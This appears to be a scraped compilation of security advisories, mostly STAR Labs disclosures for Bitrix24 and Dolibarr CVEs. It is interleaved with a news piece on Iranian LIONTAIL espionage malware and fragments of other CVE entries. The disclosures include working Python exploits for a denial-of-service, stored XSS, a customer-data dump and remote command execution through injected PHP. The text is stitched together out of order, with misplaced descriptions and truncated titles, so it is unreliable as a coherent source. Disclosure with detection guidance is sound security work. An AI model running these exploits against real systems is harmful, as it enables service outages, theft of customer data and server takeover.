Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.

CVE-2023-1719: (CVE-2023-1719) Bitrix24 Insecure Global Variable Extraction


Improper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

High

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1718

**CVE Description**

Improper file stream access in /desktop\_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted “tmp\_url”.

**CWE Classification(s)**

CWE-835 Loop with Unreachable Exit Condition (‘Infinite Loop’)

**CAPEC Classification(s)**

CAPEC-545 Pull Data from System Resources

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

None

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

None

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Denial of Service (DoS) vulnerability that allows an attacker cause the affected webserver to be unresponsive due to excessive computing resource consumption.

Unauthenticated users may use the file upload functionality provided by the /desktop_app/file.ajax.php?action=uploadfile. In addition to files uploaded within the request, files can also be specified by their URL. These files will then by downloaded and saved. This URL is specified in the tmp_url field of the supplied file object.

The checkFile function is eventually called on the file object:

    // bitrix/modules/main/lib/ui/uploader/file.php line 590
    
    public static function checkFile(&$file, File $f, $params)
    {
        $result = new Result();
        if ($file["error"] > 0)
            $result->addError(new Error(File::getUploadErrorMessage($file["error"]), "BXU347.2.9".$file["error"]));
        else if (array_key_exists("tmp_url", $file))
        {
            $url = new Uri($file["tmp_url"]); // [1]
            if ($url->getHost() == '' && 
                ($tmp = \CFile::MakeFileArray($url->getPath())) && // [2]
                is_array($tmp))
            {
                $file = array_merge($tmp, $file);
            }
            // ...
        }
        // ...
    }
    

In [1], the URL supplied in tmp_url is parsed. The path of the URL is then passed to CFile::MakeFileArray in [2].

    // bitrix/modules/main/classes/general/file.php line 1734
    
    public static function MakeFileArray($path, $mimetype = false, $skipInternal = false, $external_id = "")
    {
        $io = CBXVirtualIo::GetInstance();
        $arFile = array();
    
        if(intval($path)>0)
        {
            // ...
        }
    
        $path = preg_replace("#(?<!:)[\\\\\\/]+#", "/", $path);
    
        if($path == '' || $path == "/")
        {
            return NULL;
        }
    
        if(preg_match("#^(php://filter|phar://)#i", $path))
        {
            return NULL;
        }
    
        if(preg_match("#^(http[s]?)://#", $path))
        {
            // ...
        }
        elseif(preg_match("#^(ftp[s]?|php)://#", $path)) // [3]
        {
            if($fp = fopen($path,"rb"))
            {
                $content = "";
                while(!feof($fp)) // [4]
                {
                    $content .= fgets($fp, 4096);
                }
    
                if($content <> '')
                {
                    // ...
                }
    
                fclose($fp);
            }
        }
        else
        {
            // ...
        }
    
        // ..
    }
    

If the path starts with ftp://, ftps:// or php://, control flow enters the branch at [3]. The file is then opened with fopen, and its contents are read in chunks of 4096 bytes until the EOF marker is reached ([4]).

However, if an attacker specifies the PHP stream php://stdout, the EOF marker will never be reached as the stream is a write-only stream. Therefore, the program will enter an infinite loop as !feof($fp) will always be true.

This will result in the process handling the request consuming as much compute time as it is allowed, preventing the handling of other legitimate requests.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that results in Denial of Service via resource exhaustion on the target server.

A sample exploit script is shown below:

    # Bitrix24 Improper File Stream Access DoS (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/desktop_app/file.ajax.php?action=uploadfile
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import random
    
    import requests
    import re
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def preauth(s):
        res = s.get(HOST)
        return re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), res.text).group(
            1
        )
    
    
    def DoS(session, sessid):
        CID = random.randint(0, pow(10, 5))
        session.post(
            HOST + "/desktop_app/file.ajax.php?action=uploadfile",
            headers={
                "X-Bitrix-Csrf-Token": sessid,
                "X-Bitrix-Site-Id": SITE_ID,
            },
            data={
                "bxu_info[mode]": "upload",
                "bxu_info[CID]": str(CID),
                "bxu_info[filesCount]": "1",
                "bxu_info[packageIndex]": f"pIndex{CID}",
                "bxu_info[NAME]": f"file{CID}",
                "bxu_files[0][name]": f"file{CID}",
                "bxu_files[0][files][default][tmp_url]": f"a:php://stdout",
                "bxu_files[0][files][default][tmp_name]": f"file{CID}",
            },
            proxies=PROXY,
        )
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = preauth(s)
        print("[+] Launching DoS...")
        DoS(s, sessid)
    

**Exploit Conditions:**

This vulnerability can be exploited by unauthenticated users.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of php://stdout or file:///dev/stdout in request bodies.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1718: (CVE-2023-1718) Bitrix24 Denial-of-Service (DoS) via Improper File Stream Access

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop_app/file.ajax.php?action=uploadfile.

**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

High

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1720

**CVE Description**

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop\_app/file.ajax.php?action=uploadfile.

**CWE Classification(s)**

CWE-434 Unrestricted Upload of File with Dangerous Type

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.6 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

None

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Unauthenticated users may use the file upload functionality provided by the /desktop_app/file.ajax.php?action=uploadfile. This endpoint also returns the absolute path of the file on the server, which is of the form $BX_ROOT/upload/tmp/BXTEMP-YYYY-MM-DD/00/bxu/disk/XXX/XXX/default where XXX is a 32 character long hexadecimal string.

As the uploads directory is publicly accessible to the internet, an attacker can determine the URL where Apache will serve their malicious uploaded file. As the uploaded file does not have a file extension, Apache serves the file without a content-type header. Therefore, the browser will have to examine the contents of the response to determine its content type. Thus, if the file contains HTML tags, the browser will render the file as HTML and execute any JavaScript that is present in the file, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that uploads a malicious HTML file that executes JavaScript to display the current domain name.

A sample exploit script is shown below:

    # Bitrix24 Stored XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/desktop_app/file.ajax.php?action=uploadfile
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import random
    
    import requests
    import re
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def preauth(s):
        res = s.get(HOST)
        return re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), res.text).group(
            1
        )
    
    
    def upload(session, sessid, data):
        CID = random.randint(0, pow(10, 5))
        resp = session.post(
            HOST + "/desktop_app/file.ajax.php?action=uploadfile",
            headers={
                "X-Bitrix-Csrf-Token": sessid,
                "X-Bitrix-Site-Id": SITE_ID,
            },
            data={
                "bxu_info[mode]": "upload",
                "bxu_info[CID]": str(CID),
                "bxu_info[filesCount]": "1",
                "bxu_info[packageIndex]": f"pIndex{CID}",
                "bxu_info[NAME]": f"file{CID}",
                "bxu_files[0][name]": f"file{CID}",
            },
            files={
                "bxu_files[0][default]": (
                    "file",
                    data,
                    "text/plain",
                )
            },
            proxies=PROXY,
        ).json()
        return resp["files"][0]["file"]["files"]["default"]["tmp_name"]
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = preauth(s)
        path = upload(s, sessid, "<script>alert(document.domain)</script>")
        print("Uploaded file to " + path)
        relpath = path[path.index("/upload"):]
        print("Check out " + HOST + relpath + " for XSS!")
    

**Exploit Conditions:**

This vulnerability can be exploited by unauthenticated users. However, the victim has to visit a specially crafted URL supplied by the attacker.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of <script> tags and other XSS vectors in uploaded files.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1720: (CVE-2023-1720) Bitrix24 Stored Cross-Site Scripting (XSS) via File Upload

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Dolibarr Improper Input Validation vulnerability**

High severity GitHub Reviewed Published Nov 1, 2023 to the GitHub Advisory Database • Updated Nov 1, 2023

GHSA-r9cm-pw9j-3fpx: Dolibarr Improper Input Validation vulnerability

Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 17.0.3

**Tested Versions**

17.0.1, 17.0.3

**CVE Identifier**

CVE-2023-4198

**CVE Description**

Improper Access Control in Dolibarr ERP CRM v17.0.3 allows unauthorized users to read a database table containing sensitive third-party customers’ information via the ajaxcompanies.php endpoint.

**CWE Classification(s)**

CWE-862 Missing Authorization

**CAPEC Classification(s)**

CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs

**CVSS3.1 Scoring System:**

**Base Score:** 6.5 (Medium)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

None

**Availability (A)**

None

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Authorization checks were found to be missing as any authenticated user is able to list the details of all third-party customers stored in the database table societe, despite not having the required permissions to do so. This table contains sensitive data such as the third-party customers’ address, ZIP and town name.

**Vulnerability Details:**

The vulnerability is found at the /core/ajax/ajaxcompanies.php endpoint. It can be observed that no authorisation checks are performed, even though the application has the option to configure access control for each AJAX endpoint. The affected code can be found below:

    // /core/ajax/ajaxcompanies.php
    
    $socid = $_GET['newcompany'] ? $_GET['newcompany'] : '';
    // ...
    $sql .= "s.nom LIKE '%".$db->escape($socid)."%'";
    $sql .= " OR s.code_client LIKE '%".$db->escape($socid)."%'";
    $sql .= " OR s.code_fournisseur LIKE '%".$db->escape($socid)."%'";
    

Additionally, since the SQL query is formed by concatenating user-input in the LIKE clause, listing every row can be done by injecting % as the input. In order to exploit the vulnerability, the adversary must first be authenticated with any account. Then, access the vulnerable page by sending a GET request to:

http://TARGET_SERVER/core/ajax/ajaxcompanies.php?newcompany=%

**Exploit Conditions:**

This vulnerability can be exploited by having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (<= v17.0.3) Improper Access Control Vulnerability (CVE-2023-4198)
    # Via: https://TARGET_HOST/core/ajax/ajaxcompanies.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import json
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (<= v17.0.3) Improper Access Control Vulnerability (CVE-2023-4198) =====\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def dump_table():
        # Dump the third-party customers table
        print("[+] Dumping third-party customers table (societe)...")
        res = s.get(f"{target}/core/ajax/ajaxcompanies.php?newcompany=%", verify=False, proxies={'http':'127.0.0.1:8080'})
        if res.status_code != 200:
            print("[!] Endpoint unreachable! Is the URL correct?")
            sys.exit(1)
        else:
            output = json.loads(res.text)
            print(f"[+] Output of societe table:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        dump_table()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs to see if there were any requests made to /core/ajax/ajaxcompanies.php, and inspecting the value of the newcompany parameter of these requests.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner mentioned that the endpoint has been removed since v18.0.0
*   2023-11-01 Public Release

CVE-2023-4198: (CVE-2023-4198) Dolibarr ERP CRM (

By Deeba Ahmed
Researchers believe that the primary goal behind this campaign is espionage. 
This is a post from HackRead.com Read the original post: Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

Scarred Manticore is targeting high-profile organizations focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Check Point Research (CPR) and Sygnia’s Incident Response Team have uncovered a new Iranian espionage campaign they have tied to the notorious Scarred Manticore threat group.

In its technical report titled “From Albanian to the Middle East: The Scarred Manticore is Listening,” it is revealed that the group is using a previously undocumented malware framework called LIONTAIL. This malware uses custom loaders and memory-resident shellcode payloads to blend its malicious functionalities into legitimate network traffic.

Researchers believe that the primary goal behind this campaign is espionage. This threat actor is among the Iranian actors involved in destructive cyberattacks against the Albanian government infrastructure at the behest of MOIS (Ministry of Intelligence & Security) back in July 2022. CPR claims that this threat group has been active since at least 2019, prefers gaining covert access, and persistently pursues data extraction.

Further probing revealed that Scarred Manticore is targeting high-profile organizations in the Middle East in this ongoing espionage campaign, focusing keenly on telecommunication, military, and government entities apart from financial institutions, IT service providers, and NGOs.

Though the LIONTAIL framework appears unique with no code overlaps with any known malware family detected thus far, the other tools used in the attacks overlap with previously reported attacks. Some of these attacks are linked to the OilRig or OilRig-affiliated clusters but there’s insufficient evidence to link the Scarred Manticore group with OilRig. 

Since 2019, this group has been using a custom toolset to compromise internet-exposed Windows servers in the Middle East. In this particular campaign, CPR has uncovered, that the victims are located in Saudi Arabia, the UAE, Kuwait, Jordan, Iraq, Oman, and Israel.

The geographic regions targeted in this campaign and Scarred Manticore’s previous activities sharply align with Iranian interests and with the typical victim profile targeted by MOIS-sponsored groups in espionage operations.

Scarred Manticore’s toolset has evolved considerably over time as from open-source web-based proxies, they gradually switched to powerful tools combining open-source and custom components. The Tunna-based web shell is one of the group’s earliest tools, an open-source tool used to tunnel TCP communications over HTTP to let attackers connect to any service on the remote host, even those blocked by firewalls. 

This actor now uses a range of IIS-based backdoors to target Windows servers, including custom web shells, custom DLL backdoors, and driver-based implants. The custom malware framework LIONTAIL, which CPR dubbed ‘digital chameleon,’ can establish persistence on compromised systems and steal sensitive data without being detected. It uses custom loaders and special codes to remain in the computer’s memory and hijacks the HTTP.sys driver to become a part of the regular network activity.

The evolution in Scarred Manticore’s tools and capabilities demonstrates the progress Iranian threat actors have undergone within the past few years because the techniques used in recent campaigns are far more sophisticated than previous ones tied to Iran.

****_RELATED ARTICLES_****

1.  Iran-linked hackers hit Israeli, US and EU defence tech firm
2.  GhostSec Claim Breaching Iranian Govt Surveillance Software Tool
3.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
4.  Iranian Stalkerware ‘Spyhide’ Steals Data from 60,000 Android Devices
5.  Ransom fail: Iranian hackers leak trove of Israeli LGBTQ dating app data
6.  Log4Shell – Iranian Hackers Accessed Domain Controller of US Federal Network

Iran’s Scarred Manticore Targets Middle East with LIONTAIL Malware

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 18.0.1

**Tested Versions**

17.0.1, 18.0.1

**CVE Identifier**

CVE-2023-4197

**CVE Description**

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**CWE Classification(s)**

CWE-20: Improper Input Validation

**CAPEC Classification(s)**

CAPEC-248 Command Injection CAPEC-153: Input Data Manipulation

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

High

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for <?php and <?=, allowing usage of the <? short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP.

**Vulnerability Details:**

There are two ways to exploit this vulnerability, one is to “import” content from a specified URL; the other is to edit an existing page.

The vulnerable code can be found in the function dolKeepOnlyPhpCode(), inside the /core/lib/website.lib.php file. where no checking for the <? tag is done. This function intended purpose is to extract the PHP code from the given string and return it to the caller. The caller would throw an error if this function returns a non-empty string since it indicates the presence of PHP code.

    /core/lib/website.lib.php:
    <?php
    
    function dolKeepOnlyPhpCode($str)
    {
        $str = str_replace('<?=', '<?php', $str);
    
        $newstr = '';
    
        // Split on each opening tag
        //$parts = explode('<?php', $str);
        $parts = preg_split('/'.preg_quote('<?php', '/').'/i', $str);
    
        if (!empty($parts)) {
            $i = 0;
            foreach ($parts as $part) {
                if ($i == 0) {  // The first part is never php code
                    $i++;
                    continue;
                }
                $newstr .= '<?php';
                //split on closing tag
                $partlings = explode('?>', $part, 2);
                if (!empty($partlings)) {
                    $newstr .= $partlings[0].'?>';
                } else {
                    $newstr .= $part.'?>';
                }
            }
        }
        return $newstr;
    }
    

This function takes in a single argument which is the string to sanitize. It first replaces all occurrences of <?= with <?php and subsequently all <?php tags are tokenized, and the string between the opening and optional closing tags are selected and returned to the caller.

In order to achieve RCE, the adversary must first be authenticated with an account and the Website module must be enabled. Then, modify an existing web page to include the <? tag where arbitrary PHP code can be executed. Command execution is achieved by using any of the PHP functions that executes system code (i.e. system()). After the web page is modified successfully, previewing the updated page would trigger the RCE:

**Exploit Conditions:**

This vulnerability can be exploited when the “Website” module is enabled, as well as having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197)
    # Via: https://TARGET_HOST/website/index.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    import sys
    import uuid
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====\n")
    
        if len(sys.argv) != 5:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD CMD_TO_EXECUTE".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
        cmd = sys.argv[4]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def rce():
        # Create web site
        print("[+] Attempting to create a website...")
        website_name = uuid.uuid4().hex
        data = {
            "WEBSITE_REF": website_name,
            "token": csrf_token,
            "action": "addsite",
            "WEBSITE_LANG": "en",
            "addcontainer": "create"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Website - {website_name}" not in res.text:
            print("[!] Website creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created website name: \"{website_name}\"!")
    
        # Create web page
        print("[+] Attempting to create a web page...")
        webpage_name = uuid.uuid4().hex
        data = {
            "website": website_name,
            "token": csrf_token,
            "action": "addcontainer",
            "WEBSITE_TYPE_CONTAINER": "page",
            "WEBSITE_TITLE": "x",
            "WEBSITE_PAGENAME": webpage_name
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Contenair \\'{webpage_name}\\' added" not in res.text:
            print("[!] Web page creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created web page name: \"{webpage_name}\"!")
    
        # Modify created page
        print("[+] Attempting to modify the web page...")
        webpage_id = re.search(f"<option value=\"(.+)\" .+{webpage_name}", res.text).group(1).strip()
        data = {
            "website": website_name,
            "WEBSITE_PAGENAME": webpage_name,
            "pageid": webpage_id,
            "token": csrf_token,
            "action": "updatemeta",
            "htmlheader": f"<? echo system('{cmd}'); ?>"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if "Saved" not in res.text:
            print("[!] Web page modification failed!")
            sys.exit(1)
        else:
            print("[+] Web page modified successfully!")      
    
        # Trigger RCE
        print(f"[+] Triggering RCE now via: {target}/public/website/index.php?website={website_name}&pageref={webpage_name}")
        res = s.get(f"{target}/public/website/index.php?website={website_name}&pageref={webpage_name}", verify=False)
        if res.status_code != 200:
            print("[!] Web page is not reachable!")
            sys.exit(1)
        else:
            output = re.findall("block -->\n(.+)</head>", res.text, re.MULTILINE | re.DOTALL)[0].strip()
            print(f"[+] RCE successful! Output of command:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        rce()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the /document/ directory (default upload directory) to see if there are any .tpl files containing <? tags, and further inspecting the code contained within.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner acknowledged vulnerability and pushed a patch commit. Also mentioned that it will be in the next release
*   2023-10-11 New version containing patch released
*   2023-11-01 Public Release

CVE-2023-4197: (CVE-2023-4197) Dolibarr ERP CRM (


Poorly constructed webap requests and URI components with special characters trigger unhandled errors and exceptions, disclosing
information about the underlying technology and other sensitive information details. The website unintentionally reveals sensitive information including technical details like version Info, endpoints,
backend server, Internal IP. etc., which can potentially expose additional attack surface containing other interesting vulnerabilities. 



CVE-2023-5516

Stored Cross Site Scripting (XSS) vulnerability in MiniCMS 1.1.1 allows attackers to run arbitrary code via crafted string appended to /mc-admin/conf.php.

